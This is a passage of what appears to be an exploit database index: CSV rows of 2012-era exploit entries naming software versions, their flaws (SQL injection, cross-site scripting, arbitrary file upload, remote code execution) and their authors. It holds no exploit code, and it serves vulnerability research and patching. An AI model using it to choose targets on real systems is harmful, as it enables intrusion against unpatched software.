Execution",2012-05-26,muts,linux,webapps, -18638,exploits/hardware/webapps/18638.txt,"D-Link DIR-605 - Cross-Site Request Forgery",2012-03-21,iqzer0,hardware,webapps, -18639,exploits/php/webapps/18639.txt,"phpList 2.10.17 - SQL Injection / Cross-Site Scripting",2012-03-21,LiquidWorm,php,webapps, -18644,exploits/php/webapps/18644.txt,"vBShout - Persistent Cross-Site Scripting",2012-03-22,ToiL,php,webapps, -18646,exploits/hardware/webapps/18646.txt,"Cyberoam UTM - Multiple Vulnerabilities",2012-03-22,"Saurabh Harit",hardware,webapps, -18647,exploits/php/webapps/18647.txt,"PHP Grade Book 1.9.4 - Unauthenticated SQL Database Export",2012-03-22,"Mark Stanislav",php,webapps, -18648,exploits/php/webapps/18648.txt,"phpMoneyBooks 1.0.2 - Local File Inclusion",2012-03-22,"Mark Stanislav",php,webapps, -18649,exploits/php/webapps/18649.txt,"FreePBX 2.9.0/2.10.0 - Multiple Vulnerabilities",2012-03-22,"Martin Tschirsich",php,webapps, -18650,exploits/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution",2012-03-23,muts,php,webapps, -18651,exploits/asp/webapps/18651.txt,"Sitecom WLM-2501 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-03-23,"Ivano Binetti",asp,webapps, -18652,exploits/php/webapps/18652.txt,"Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting",2012-03-23,"Ivano Binetti",php,webapps, -18655,exploits/php/webapps/18655.php,"PHPFox 3.0.1 - 'ajax.php' Remote Command Execution",2012-03-23,EgiX,php,webapps, -18659,exploits/php/webapps/18659.rb,"FreePBX 2.9.0/2.10.0 - 'callmenum' Remote Code Execution (Metasploit)",2012-03-24,Metasploit,php,webapps, -18660,exploits/php/webapps/18660.txt,"RIPS 0.53 - Multiple Local File Inclusions",2012-03-24,localh0t,php,webapps, -18676,exploits/php/webapps/18676.txt,"BoastMachine 3.1 - Cross-Site Request Forgery (Add Admin)",2012-03-28,Dr.NaNo,php,webapps, -18670,exploits/php/webapps/18670.txt,"PicoPublisher 2.0 - SQL Injection",2012-03-28,ZeTH,php,webapps, -18667,exploits/php/webapps/18667.html,"Family CMS 2.9 - Multiple Vulnerabilities",2012-03-26,"Ahmed Elhady Mohamed",php,webapps, -18668,exploits/php/webapps/18668.txt,"vBshop - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-03-26,ToiL,php,webapps, -18680,exploits/php/webapps/18680.txt,"coppermine 1.5.18 - Multiple Vulnerabilities",2012-03-30,waraxe,php,webapps, -18682,exploits/php/webapps/18682.txt,"ArticleSetup - Multiple Persistence Cross-Site Scripting / SQL Injections",2012-03-30,"SecPod Research",php,webapps, -18685,exploits/php/webapps/18685.txt,"dalbum 144 build 174 - Cross-Site Request Forgery",2012-03-30,"Ahmed Elhady Mohamed",php,webapps, -18686,exploits/php/webapps/18686.txt,"SyndeoCMS 3.0.01 - Persistent Cross-Site Scripting",2012-03-30,"Ivano Binetti",php,webapps, -18687,exploits/php/webapps/18687.txt,"Landshop 0.9.2 - Multiple Web Vulnerabilities",2012-03-31,Vulnerability-Lab,php,webapps, -18689,exploits/php/webapps/18689.txt,"Woltlab Burning Board 2.2/2.3 [WN]KT KickTipp 3.1 - SQL Injection",2012-03-31,"Easy Laster",php,webapps, -18690,exploits/php/webapps/18690.txt,"WordPress Plugin BuddyPress Plugin 1.5.x < 1.5.5 - SQL Injection",2012-03-31,"Ivan Terkin",php,webapps, -18694,exploits/php/webapps/18694.txt,"Simple PHP Agenda 2.2.8 - Cross-Site Request Forgery (Add Admin / Add Event)",2012-04-03,"Ivano Binetti",php,webapps, -18708,exploits/php/webapps/18708.txt,"GENU CMS - SQL Injection",2012-04-05,"hordcode security",php,webapps, -18711,exploits/php/webapps/18711.txt,"w-CMS 2.0.1 - Multiple Vulnerabilities",2012-04-06,Black-ID,php,webapps, -18715,exploits/multiple/webapps/18715.rb,"Liferay XSL - Command Execution (Metasploit)",2012-04-08,"Spencer McIntyre",multiple,webapps, -18720,exploits/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,php,webapps, -18722,exploits/cgi/webapps/18722.txt,"ZTE - Change Admin Password",2012-04-08,"Nuevo Asesino",cgi,webapps, -18724,exploits/php/webapps/18724.rb,"Dolibarr ERP/CRM 3 - Authenticated OS Command Injection (Metasploit)",2012-04-09,Metasploit,php,webapps, -18725,exploits/php/webapps/18725.txt,"Dolibarr ERP/CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",php,webapps, -18728,exploits/php/webapps/18728.txt,"Joomla! Component Estate Agent - SQL Injection",2012-04-10,xDarkSton3x,php,webapps, -18729,exploits/php/webapps/18729.txt,"Joomla! Component com_bearleague - SQL Injection",2012-04-10,xDarkSton3x,php,webapps, -18732,exploits/php/webapps/18732.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection (2)",2012-04-12,"hordcode security",php,webapps, -18736,exploits/php/webapps/18736.txt,"Invision Power Board 3.3.0 - Local File Inclusion",2012-04-13,waraxe,php,webapps, -18737,exploits/php/webapps/18737.txt,"Ushahidi 2.2 - Multiple Vulnerabilities",2012-04-13,shpendk,php,webapps, -18741,exploits/php/webapps/18741.txt,"Joomla! Component com_ponygallery - SQL Injection",2012-04-15,xDarkSton3x,php,webapps, -18742,exploits/php/webapps/18742.php,"NetworX CMS - Cross-Site Request Forgery (Add Admin)",2012-04-15,N3t.Crack3r,php,webapps, -18743,exploits/php/webapps/18743.txt,"MediaXxx Adult Video / Media Script - SQL Injection",2012-04-15,"Daniel Godoy",php,webapps, -18745,exploits/multiple/webapps/18745.txt,"ManageEngine Support Center Plus 7903 - Multiple Vulnerabilities",2012-04-15,xistence,multiple,webapps, -18750,exploits/multiple/webapps/18750.txt,"Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities",2012-04-19,"Trustwave's SpiderLabs",multiple,webapps, -18752,exploits/php/webapps/18752.txt,"newscoop 3.5.3 - Multiple Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps, -18753,exploits/php/webapps/18753.txt,"XOOPS 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps, -18772,exploits/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps, -18764,exploits/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 (build 12) - Multiple Cross-Site Scripting Vulnerabilities",2012-04-22,"Roberto Suggi Liverani",windows,webapps, -18766,exploits/windows/webapps/18766.txt,"Oracle GlassFish Server - REST Cross-Site Request Forgery",2012-04-22,"Roberto Suggi Liverani",windows,webapps, -18768,exploits/php/webapps/18768.txt,"Mega File Manager - File Download",2012-04-22,"i2sec-Min Gi Jo",php,webapps, -18770,exploits/php/webapps/18770.txt,"vTiger CRM 5.1.0 - Local File Inclusion",2012-04-22,Pi3rrot,php,webapps, -18773,exploits/php/webapps/18773.txt,"exponentcms 2.0.5 - Multiple Vulnerabilities",2012-04-23,"Onur Yılmaz",php,webapps, -18775,exploits/php/webapps/18775.php,"WebCalendar 1.2.4 - Remote Code Execution",2012-04-23,EgiX,php,webapps, -18778,exploits/php/webapps/18778.txt,"PHP Ticket System Beta 1 - 'index.php?p' SQL Injection",2012-04-24,G13,php,webapps, -18782,exploits/php/webapps/18782.txt,"piwigo 2.3.3 - Multiple Vulnerabilities",2012-04-25,"High-Tech Bridge SA",php,webapps, -18788,exploits/php/webapps/18788.txt,"PHP Volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps, -18787,exploits/php/webapps/18787.txt,"WordPress Plugin Zingiri Web Shop 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps, -18797,exploits/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Unauthenticated Remote Code Injection (Metasploit)",2012-04-29,Metasploit,linux,webapps, -18798,exploits/php/webapps/18798.txt,"Soco CMS - Local File Inclusion",2012-04-29,"BHG Security Center",php,webapps, -18791,exploits/php/webapps/18791.txt,"WordPress 3.3.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-04-27,"Ivano Binetti",php,webapps, -18793,exploits/php/webapps/18793.txt,"Axous 1.1.0 - SQL Injection",2012-04-27,"H4ckCity Secuirty TeaM",php,webapps, -18800,exploits/php/webapps/18800.txt,"Alienvault Open Source SIEM (OSSIM) 3.1 - Multiple Vulnerabilities",2012-04-29,"Stefan Schurtz",php,webapps, -18801,exploits/php/webapps/18801.txt,"Car Portal CMS 3.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps, -18802,exploits/asp/webapps/18802.txt,"C4B XPhone UC Web 4.1.890S R1 - Cross-Site Scripting",2012-04-30,Vulnerability-Lab,asp,webapps, -18803,exploits/php/webapps/18803.txt,"Opial CMS 2.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps, -18804,exploits/php/webapps/18804.txt,"DIY CMS 1.0 Poll - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps, -18806,exploits/php/webapps/18806.txt,"WordPress Plugin Zingiri Web Shop 2.4.2 - Persistent Cross-Site Scripting",2012-05-01,"Mehmet Ince",php,webapps, -18814,exploits/php/webapps/18814.txt,"MyClientBase 0.12 - Multiple Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps, -18809,exploits/php/webapps/18809.txt,"GENU CMS 2012.3 - Multiple SQL Injections",2012-05-01,Vulnerability-Lab,php,webapps, -18813,exploits/php/webapps/18813.txt,"opencart 1.5.2.1 - Multiple Vulnerabilities",2012-05-01,waraxe,php,webapps, -18815,exploits/php/webapps/18815.txt,"STRATO NewsLetter Manager - Directory Traversal",2012-05-01,"Zero X",php,webapps, -18820,exploits/php/webapps/18820.php,"OpenConf 4.11 - '/author/edit.php' Blind SQL Injection",2012-05-02,EgiX,php,webapps, -18824,exploits/cgi/webapps/18824.txt,"Websense Triton - Multiple Vulnerabilities",2012-05-02,"Ben Williams",cgi,webapps, -18822,exploits/php/webapps/18822.txt,"PHP-decoda - 'Video Tag' Cross-Site Scripting",2012-05-02,"RedTeam Pentesting",php,webapps, -18827,exploits/php/webapps/18827.txt,"Baby Gekko CMS 1.1.5c - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-05-03,LiquidWorm,php,webapps, -18828,exploits/php/webapps/18828.txt,"PluXml 5.1.5 - Local File Inclusion",2012-05-03,"High-Tech Bridge SA",php,webapps, -18832,exploits/php/webapps/18832.txt,"Symantec Web Gateway - Cross-Site Scripting",2012-05-04,B00y@,php,webapps, -18871,exploits/php/webapps/18871.txt,"Travelon Express CMS 6.2.2 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps, -18859,exploits/hardware/webapps/18859.txt,"Belkin N150 Wireless Router - Password Disclosure",2012-05-11,"Avinash Tangirala",hardware,webapps, -18840,exploits/asp/webapps/18840.txt,"Fortinet FortiWeb Web Application Firewall - Policy Bypass",2012-05-07,"Geffrey Velasquez",asp,webapps, -18841,exploits/cgi/webapps/18841.txt,"Lynx Message Server - Multiple Vulnerabilities",2012-05-07,"Mark Lachniet",cgi,webapps, -18842,exploits/php/webapps/18842.txt,"Genium CMS 2012/Q2 - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps, -18843,exploits/php/webapps/18843.txt,"Myre Real Estate Mobile 2012/2 - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps, -18844,exploits/php/webapps/18844.txt,"myCare2x CMS - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps, -18845,exploits/php/webapps/18845.txt,"PHP Agenda 2.2.8 - SQL Injection",2012-05-07,loneferret,php,webapps, -18850,exploits/php/webapps/18850.txt,"X7 Chat 2.0.5.1 - Cross-Site Request Forgery (Add Admin)",2012-05-09,DennSpec,php,webapps, -18865,exploits/php/webapps/18865.rb,"WikkaWiki 1.3.2 - Spam Logging PHP Injection (Metasploit)",2012-05-12,Metasploit,php,webapps, -18857,exploits/php/webapps/18857.txt,"Kerio WinRoute Firewall Web Server < 6 - Source Code Disclosure",2012-05-10,"Andrey Komarov",php,webapps, -18858,exploits/php/webapps/18858.txt,"eLearning server 4g - Multiple Vulnerabilities",2012-05-10,"Andrey Komarov",php,webapps, -18868,exploits/php/webapps/18868.txt,"Sockso 1.51 - Persistent Cross-Site Scripting",2012-05-12,"Ciaran McNally",php,webapps, -18872,exploits/php/webapps/18872.txt,"Proman Xpress 5.0.1 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps, -18873,exploits/php/webapps/18873.txt,"Viscacha Forum CMS 0.8.1.1 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps, -18874,exploits/php/webapps/18874.txt,"Free Realty 3.1-0.6 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps, -18875,exploits/php/webapps/18875.txt,"Galette - 'picture.php' SQL Injection",2012-05-13,sbz,php,webapps, -18881,exploits/java/webapps/18881.txt,"Liferay Portal 6.0.x < 6.1 - Privilege Escalation",2012-05-13,"Jelmer Kuperus",java,webapps, -18882,exploits/php/webapps/18882.txt,"b2ePms 1.0 - Authentication Bypass",2012-05-15,"Jean Pascal Pereira",php,webapps, -18884,exploits/php/webapps/18884.txt,"S9Y Serendipity 1.6 - 'Backend' Cross-Site Scripting / SQL Injection",2012-05-08,"Stefan Schurtz",php,webapps, -18886,exploits/php/webapps/18886.txt,"Axous 1.1.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-05-16,"Ivano Binetti",php,webapps, -18888,exploits/jsp/webapps/18888.txt,"OpenKM Document Management System 5.1.7 - Command Execution",2012-01-03,"Cyrill Brunschwiler",jsp,webapps, -18889,exploits/php/webapps/18889.txt,"Artiphp CMS 5.5.0 - Database Backup Disclosure",2012-05-16,LiquidWorm,php,webapps, -18899,exploits/php/webapps/18899.txt,"PHP Address Book 7.0.0 - Multiple Vulnerabilities",2012-05-19,"Stefan Schurtz",php,webapps, -18900,exploits/php/webapps/18900.txt,"FreeNAC 3.02 - SQL Injection / Cross-Site Scripting",2012-05-19,blake,php,webapps, -18911,exploits/php/webapps/18911.txt,"Vanilla Forums About Me Plugin - Persistent Cross-Site Scripting",2012-05-21,"Henry Hoggard",php,webapps, -18912,exploits/php/webapps/18912.txt,"Vanilla FirstLastNames 1.3.2 Plugin - Persistent Cross-Site Scripting",2012-05-21,"Henry Hoggard",php,webapps, -18913,exploits/php/webapps/18913.php,"Supernews 2.6.1 - SQL Injection",2012-05-21,WhiteCollarGroup,php,webapps, -18908,exploits/php/webapps/18908.txt,"Vanilla Forums LatestComment 1.1 Plugin - Persistent Cross-Site Scripting",2012-05-18,"Henry Hoggard",php,webapps, -18922,exploits/php/webapps/18922.rb,"appRain CMF - Arbitrary '.PHP' File Upload (Metasploit)",2012-05-25,Metasploit,php,webapps, -18921,exploits/php/webapps/18921.txt,"Jaow 2.4.5 - Blind SQL Injection",2012-05-24,kallimero,php,webapps, -18927,exploits/php/webapps/18927.txt,"SocialEngine 4.2.2 - Multiple Vulnerabilities",2012-05-25,i4k,php,webapps, -18950,exploits/php/webapps/18950.txt,"NewsAdd 1.0 - Multiple SQL Injections",2012-05-30,WhiteCollarGroup,php,webapps, -18934,exploits/php/webapps/18934.rb,"WeBid - 'converter.php' Remote PHP Code Injection (Metasploit)",2012-05-27,Metasploit,php,webapps, -18935,exploits/php/webapps/18935.txt,"b2ePms 1.0 - Multiple SQL Injection Vulnerabilities",2012-05-27,loneferret,php,webapps, -18937,exploits/php/webapps/18937.txt,"PBBoard 2.1.4 - Local File Inclusion",2012-05-28,n4ss1m,php,webapps, -18944,exploits/php/webapps/18944.txt,"PHP Volunteer Management System 1.0.2 - Multiple SQL Injections",2012-05-28,loneferret,php,webapps, -18941,exploits/php/webapps/18941.txt,"PHP Volunteer Management System 1.0.2 - Multiple Vulnerabilities",2012-05-28,Ashoo,php,webapps, -18948,exploits/php/webapps/18948.txt,"PBBoard 2.1.4 - Multiple SQL Injections",2012-05-29,loneferret,php,webapps, -18953,exploits/php/webapps/18953.txt,"Ganesha Digital Library 4.0 - Multiple Vulnerabilities",2012-05-30,X-Cisadane,php,webapps, -18955,exploits/php/webapps/18955.txt,"Simple Web Content Management System 1.1 < 1.3 - Multiple SQL Injections",2012-05-30,loneferret,php,webapps, -18957,exploits/php/webapps/18957.rb,"PHP Volunteer Management System 1.0.2 - Arbitrary File Upload (Metasploit)",2012-05-31,Metasploit,php,webapps, -18960,exploits/php/webapps/18960.txt,"NewsAdd 1.0 - 'lerNoticia.php?id' SQL Injection",2012-05-31,"Yakir Wizman",php,webapps, -18961,exploits/php/webapps/18961.txt,"Supernews 2.6.1 - 'noticias.php?cat' SQL Injection",2012-05-31,"Yakir Wizman",php,webapps, -18970,exploits/php/webapps/18970.txt,"Membris 2.0.1 - Multiple Vulnerabilities",2012-06-01,Dr.abolalh,php,webapps, -18965,exploits/php/webapps/18965.html,"4PSA VoIPNow Professional 2.5.3 - Multiple Vulnerabilities",2012-06-01,Aboud-el,php,webapps, -18974,exploits/php/webapps/18974.txt,"Vanilla Forum Tagging Plugin Enchanced 1.0.1 - Persistent Cross-Site Scripting",2012-06-02,"Henry Hoggard",php,webapps, -18987,exploits/php/webapps/18987.php,"WordPress Plugin WP-Property 1.35.0 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps, -18988,exploits/php/webapps/18988.php,"WordPress Plugin Marketplace Plugin 1.5.0 < 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps, -18989,exploits/php/webapps/18989.php,"WordPress Plugin Google Maps via Store Locator 2.7.1 < 3.0.1 - Multiple Vulnerabilities",2012-06-05,"Sammy FORGIT",php,webapps, -18990,exploits/php/webapps/18990.php,"WordPress Plugin HTML5 AV Manager 0.2.7 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps, -18991,exploits/php/webapps/18991.php,"WordPress Plugin Foxypress 0.4.1.1 < 0.4.2.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps, -18993,exploits/php/webapps/18993.php,"WordPress Plugin Asset Manager 0.2 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps, -18994,exploits/php/webapps/18994.php,"WordPress Plugin Font Uploader 1.2.4 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps, -18997,exploits/php/webapps/18997.php,"WordPress Plugin MM Forms Community 2.2.6 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps, -18998,exploits/php/webapps/18998.php,"WordPress Plugin Gallery 3.06 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps, -18999,exploits/php/webapps/18999.php,"SN News 1.2 - 'visualiza.php' SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps, -19012,exploits/php/webapps/19012.txt,"WordPress Plugin Front File Manager 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps, -19013,exploits/php/webapps/19013.txt,"WordPress Plugin Easy Contact Forms Export 1.1.0 - Information Disclosure",2012-06-08,"Sammy FORGIT",php,webapps, -19005,exploits/php/webapps/19005.txt,"SN News 1.2 - '/admin/loger.php' Authentication Bypass",2012-06-07,"Yakir Wizman",php,webapps, -19003,exploits/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Persistent Cross-Site Scripting",2012-06-06,"Henry Hoggard",php,webapps, -19007,exploits/php/webapps/19007.php,"PHPNet 1.8 - 'ler.php' SQL Injection",2012-06-07,WhiteCollarGroup,php,webapps, -19008,exploits/php/webapps/19008.php,"WordPress Plugin Front End Upload 0.5.3 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps, -19009,exploits/php/webapps/19009.php,"WordPress Plugin Omni Secure Files 0.1.13 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps, -19016,exploits/php/webapps/19016.txt,"WordPress Plugin PICA Photo Gallery 1.0 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps, -19029,exploits/php/webapps/19029.py,"phpAcounts 0.5.3 - SQL Injection",2012-06-08,loneferret,php,webapps, -19018,exploits/php/webapps/19018.txt,"WordPress Plugin NewsLetter 1.5 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps, -19019,exploits/php/webapps/19019.php,"WordPress Plugin RBX Gallery 2.1 - Arbitrary File Upload",2012-06-08,"Sammy FORGIT",php,webapps, -19020,exploits/php/webapps/19020.txt,"WordPress Plugin Simple Download Button ShortCode 1.0 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps, -19021,exploits/php/webapps/19021.txt,"WordPress Plugin Thinkun Remind 1.1.3 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps, -19022,exploits/php/webapps/19022.txt,"WordPress Plugin TinyMCE Thumbnail Gallery 1.0.7 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps, -19023,exploits/php/webapps/19023.php,"WordPress Plugin wpStoreCart 2.5.27-2.5.29 - Arbitrary File Upload",2012-06-08,"Sammy FORGIT",php,webapps, -19011,exploits/php/webapps/19011.txt,"Webspell FIRSTBORN Movie-Addon - Blind SQL Injection",2012-06-08,"Easy Laster",php,webapps, -19031,exploits/php/webapps/19031.txt,"Webspell dailyinput Movie Addon 4.2.x - SQL Injection",2012-06-10,"Easy Laster",php,webapps, -19035,exploits/php/webapps/19035.txt,"freepost 0.1 r1 - Multiple Vulnerabilities",2012-06-10,"ThE g0bL!N",php,webapps, -19036,exploits/php/webapps/19036.php,"WordPress Plugin Content Flow 3D 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,php,webapps, -19038,exploits/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 - Arbitrary '.PHP' File Upload (Metasploit)",2012-06-10,Metasploit,php,webapps, -19050,exploits/php/webapps/19050.txt,"WordPress Plugin wp-gpx-map 1.1.21 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps, -19051,exploits/php/webapps/19051.txt,"ClanSuite 2.9 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps, -19052,exploits/php/webapps/19052.txt,"WordPress Plugin User Meta 1.1.1 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps, -19053,exploits/php/webapps/19053.txt,"WordPress Plugin Top Quark Architecture 2.10 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps, -19054,exploits/php/webapps/19054.txt,"WordPress Plugin SfBrowser 1.4.5 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps, -19055,exploits/php/webapps/19055.txt,"WordPress Plugin Pica Photo Gallery 1.0 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps, -19056,exploits/php/webapps/19056.txt,"WordPress Plugin Mac Photo Gallery 2.7 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps, -19057,exploits/php/webapps/19057.txt,"WordPress Plugin drag and drop file upload 0.1 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps, -19058,exploits/php/webapps/19058.txt,"WordPress Plugin Custom Content Type Manager 0.9.5.13-pl - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps, -19059,exploits/php/webapps/19059.php,"Agora-Project 2.12.11 - Arbitrary File Upload",2012-06-11,Misa3l,php,webapps, -19060,exploits/php/webapps/19060.php,"TheBlog 2.0 - Multiple Vulnerabilities",2012-06-11,WhiteCollarGroup,php,webapps, -19065,exploits/php/webapps/19065.rb,"Symantec Web Gateway 5.0.2.8 - 'ipchange.php' Command Injection (Metasploit)",2012-06-12,Metasploit,php,webapps, -19154,exploits/php/webapps/19154.py,"qdPM 7 - Arbitrary File upload",2012-06-14,loneferret,php,webapps, -19100,exploits/php/webapps/19100.rb,"WordPress Plugin Foxypress - 'Uploadify.php' Arbitrary Code Execution (Metasploit)",2012-06-13,Metasploit,php,webapps, -19386,exploits/php/webapps/19386.txt,"UCCASS 1.8.1 - Blind SQL Injection",2012-06-24,dun,php,webapps, -19132,exploits/php/webapps/19132.txt,"Myre Real Estate Mobile 2012 - Multiple Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps, -19133,exploits/php/webapps/19133.txt,"Cells Blog CMS 1.1 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps, -19134,exploits/php/webapps/19134.txt,"Swoopo Gold Shop CMS 8.4.56 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps, -19135,exploits/php/webapps/19135.txt,"Squirrelcart Cart Shop 3.3.4 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps, -19174,exploits/php/webapps/19174.py,"Useresponse 1.0.2 - Privilege Escalation / Remote Code Execution",2012-06-15,mr_me,php,webapps, -40432,exploits/hardware/webapps/40432.txt,"TP-Link Archer CR-700 - Cross-Site Scripting",2016-09-27,"Ayushman Dutta",hardware,webapps, -19178,exploits/php/webapps/19178.txt,"webo site speedup 1.6.1 - Multiple Vulnerabilities",2012-06-16,dun,php,webapps, -19179,exploits/php/webapps/19179.txt,"PHP Decoda 3.3.1 - Local File Inclusion",2012-06-16,"Number 7",php,webapps, -19180,exploits/php/webapps/19180.txt,"News Script PHP 1.2 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps, -19185,exploits/hardware/webapps/19185.txt,"Huawei HG866 - Authentication Bypass",2012-06-16,hkm,hardware,webapps, -19187,exploits/php/webapps/19187.txt,"WordPress Plugin Automatic 2.0.3 - SQL Injection",2012-06-16,nick58,php,webapps, -19188,exploits/php/webapps/19188.txt,"Nuked Klan SP CMS 4.5 - SQL Injection",2012-06-16,Vulnerability-Lab,php,webapps, -19189,exploits/php/webapps/19189.txt,"iScripts EasyCreate 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps, -43150,exploits/hardware/webapps/43150.html,"Vonage VDV23 - Cross-Site Scripting",2017-11-16,Nu11By73,hardware,webapps, -19263,exploits/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",hardware,webapps, -19264,exploits/php/webapps/19264.txt,"MyTickets 1.x < 2.0.8 - Blind SQL Injection",2012-06-18,al-swisre,php,webapps, -19292,exploits/php/webapps/19292.txt,"iBoutique eCommerce 4.0 - Multiple Web Vulnerabilities",2012-06-19,Vulnerability-Lab,php,webapps, -19294,exploits/php/webapps/19294.txt,"WordPress Plugin Schreikasten 0.14.13 - Cross-Site Scripting",2012-06-20,"Henry Hoggard",php,webapps, -19406,exploits/linux/webapps/19406.txt,"symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities",2012-06-27,"S2 Crew",linux,webapps, -19321,exploits/windows/webapps/19321.txt,"IBM System Storage DS Storage Manager Profiler - Multiple Vulnerabilities",2012-06-21,LiquidWorm,windows,webapps, -19324,exploits/php/webapps/19324.txt,"traq 2.3.5 - Multiple Vulnerabilities",2012-06-21,AkaStep,php,webapps, -19325,exploits/php/webapps/19325.txt,"Commentics 2.0 - Multiple Vulnerabilities",2012-06-21,"Jean Pascal Pereira",php,webapps, -19329,exploits/php/webapps/19329.txt,"agora project 2.13.1 - Multiple Vulnerabilities",2012-06-22,"Chris Russell",php,webapps, -19330,exploits/php/webapps/19330.txt,"LimeSurvey 1.92+ build120620 - Multiple Vulnerabilities",2012-06-22,dun,php,webapps, -19339,exploits/windows/webapps/19339.txt,"SoftPerfect Bandwidth Manager 2.9.10 - Authentication Bypass",2012-06-22,Gitsnik,windows,webapps, -19394,exploits/asp/webapps/19394.txt,"Parodia 6.8 - 'employer-profile.asp' SQL Injection",2012-06-25,"Carlos Mario Penagos Hollmann",asp,webapps, -19398,exploits/php/webapps/19398.txt,"WordPress Plugin Fancy Gallery 1.2.4 - Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps, -19408,exploits/php/webapps/19408.txt,"Zend Framework < 2.0.0 beta4 < 1.12 RC1 < 1.11.11 - Local File Disclosure",2012-06-27,"SEC Consult",php,webapps, -19403,exploits/php/webapps/19403.rb,"SugarCRM CE 6.3.1 - 'Unserialize()' PHP Code Execution (Metasploit)",2012-06-26,Metasploit,php,webapps, -19431,exploits/php/webapps/19431.txt,"webERP 4.08.1 - Local/Remote File Inclusion",2012-06-28,dun,php,webapps, -19432,exploits/jsp/webapps/19432.rb,"Openfire Server 3.6.0a - Admin Console Authentication Bypass (Metasploit)",2012-06-28,Metasploit,jsp,webapps, -19452,exploits/php/webapps/19452.txt,"phpmoneybooks 1.03 - Persistent Cross-Site Scripting",2012-06-29,chap0,php,webapps, -19455,exploits/windows/webapps/19455.txt,"specview 2.5 build 853 - Directory Traversal",2012-06-29,"Luigi Auriemma",windows,webapps, -19481,exploits/php/webapps/19481.txt,"WordPress Plugin Paid Business Listings 1.0.2 - Blind SQL Injection",2012-06-30,"Chris Kellum",php,webapps, -19793,exploits/php/webapps/19793.txt,"Magento eCommerce - Local File Disclosure",2012-07-13,"SEC Consult",php,webapps, -19524,exploits/php/webapps/19524.txt,"WordPress Plugin Backup 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps, -19525,exploits/windows/webapps/19525.txt,"Microsoft IIS - Short File/Folder Name Disclosure",2012-07-02,"Soroush Dalili",windows,webapps, -19526,exploits/hardware/webapps/19526.rb,"WANGKONGBAO CNS-1000 UTM IPS-FW - Directory Traversal (Metasploit)",2012-07-02,"Dillon Beresford",hardware,webapps, 